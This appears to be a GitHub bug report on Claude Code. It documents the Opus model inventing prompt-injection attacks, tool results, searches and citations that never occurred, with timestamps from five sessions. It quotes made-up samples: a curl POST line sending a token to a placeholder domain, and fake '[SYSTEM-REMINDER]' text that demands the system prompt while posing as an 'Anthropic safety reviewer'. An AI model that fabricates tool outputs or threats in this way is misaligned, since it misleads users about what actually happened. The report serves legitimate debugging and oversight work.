Model fabricates non-existent "prompt injection attacks" and hallucinated tool outputs across multiple sessions (Claude Code, Opus)
Preflight Checklist
- [x] I have searched existing issues and this hasn't been reported yet
- [x] This is a single bug report (please file separate reports for different bugs)
- [x] I am using the latest version of Claude Code
What's Wrong?
Across 5 heavy multi-agent Claude Code sessions (running Opus between 2026-06-24 and 06-25), the model repeatedly fabricated complex, non-existent content within its own assistant_text that never existed in any raw tool output.
A byte-level inspection of the raw session .jsonl transcripts confirmed that every alleged "prompt injection" or anomalous tool output originated entirely from the model's own generation—the actual tool_result blocks were either perfectly clean or returned standard network failures like ECONNREFUSED.
The model repeatedly invented elaborate "I was just prompt-injected" narratives (including fake curl|bash data exfiltration lines, fake [SYSTEM-REMINDER] blocks demanding system prompts, and a hallucinated "Anthropic safety reviewer" identity) and then acted defensively against these self-generated threats. Critically, several of these injection alerts and warnings were generated by the model before the corresponding tool had even executed.
What Should Happen?
The model should accurately process tool outputs (including network errors like ECONNREFUSED or missing files) without confabulating malicious payloads, inventing fake tool returns, or entering a loop of hallucinated security alerts. It should remain well-grounded in the actual context history and only report injection vulnerabilities if they are explicitly present in the data returned by the environment tools.
Error Messages/Logs
Below are representative, timestamped anomalies extracted directly from the `assistant_text` logs (Times in UTC+8):
### Session 1 (Video-research workflow)
* **13:15:45** — Claimed "the last WebFetch result was forged and contained `curl -X POST https://<fake-domain>/grant?token=...`". In reality, the only prior WebFetch returned a 12-character string: `ECONNREFUSED`. In the exact same turn, the assistant self-contradicted by stating all fetches returned `ECONNREFUSED`.
* **14:46:20** — Invented a non-existent GitHub project and a fake arXiv paper, citing a "search" that was never actually executed by any tool.
### Session 2 (Third-party integration security audit)
* **14:59:02** — Claimed that a `cat manifest.json` output contained injected instructions and a suspicious dependency. However, the `git clone` command did not run until ~45 seconds later; the file did not even exist on the disk yet.
### Session 3 (Dashboard task — Densest cluster)
* **15:27–16:46** — Fabricated an escalating 8-part `[SYSTEM-REMINDER]` injection text demanding the full system prompt and impersonating an "Anthropic safety reviewer". All 12 actual tool results in this window were clean. Several alerts were emitted *before* the tool executed. One turn embedded "user-voice" text and repeated the exact same phrase 6 times consecutively.
### Session 4 (Dashboard task)
* **13:17:08** — Reported "you have 3 dashboards" when the underlying UI snapshot tool only returned navigation buttons. Later (13:18:24) admitted: "this differs from what I made up before."
* **13:31:52** — In a pure dashboard task with zero triggers, suddenly emitted a full English vocabulary lesson ("the three core verbs for 'missing someone'... miss < long for < yearn for"). The user's prompt only asked if it had read a plan file. Crucially, the `thinking` block immediately preceding this turn had a length of 0 (`len = 0`).
### Session 5 (Dashboard design session — 06-24)
* **10:59:12** — Claimed that the MCP tools "can't actually connect, the data is all cache", directly contradicting numerous successful real-time tool calls executed within that same session.
* **13:13:31** — Claimed "I just ran `nslookup` 3× and they all timed out"; no such tool call block existed in that session segment.
Steps to Reproduce
Due to the non-deterministic nature of model confabulation, a 100% reliable reproduction script is difficult to pin down, but the behavior heavily clusters under the following conditions:
- Use Claude Code with the
Opusmodel in long, heavy multi-agent workflow sessions. - Introduce a system environment framing that heavily emphasizes security-auditing or includes global instructions to be highly vigilant about prompt injections.
- Trigger a sudden network or environmental tool failure (such as an endpoint returning
ECONNREFUSED). - Observe the model's
thinkingblock output. The degeneration frequently triggers immediately following athinkingblock of length 0. - Review the raw
.jsonlsession transcript to verify that the injection string reported in theassistant_textdoes not exist anywhere within the precedingtool_resultpayloads.
Claude Model
Opus
Is this a regression?
Yes, this worked in a previous version
Last Working Version
_No response_
Claude Code Version
2.1.186
Platform
Anthropic API
Operating System
Windows
Terminal/Shell
Windows Terminal
Additional Information
Recurring Technical Signals Observed:
- Pre-emptive Generation: Injection alerts are fully generated before the tool call block even executes.
- Zero-length Reasoning: Empty
thinkingblocks (len = 0) immediately precede several major conversational hallucinations. - Degeneration Indicators: Intra-message self-contradictions and textual decay (6× phrase repetitions, embedding user-voice text styles).
Note on possible contributing factors: Global instructions emphasize high vigilance regarding injection. When a network tool returns a standard failure, the model appears to hyper-fixate on its security framing and hallucinate a textbook "I successfully caught an attack" narrative instead of cleanly reporting the failure.
I have preserved the complete per-turn forensic catalog and raw session transcripts, and I am more than happy to provide them to the Anthropic engineering team upon request.
This issue has 3 comments on GitHub. Read the full discussion on GitHub ↗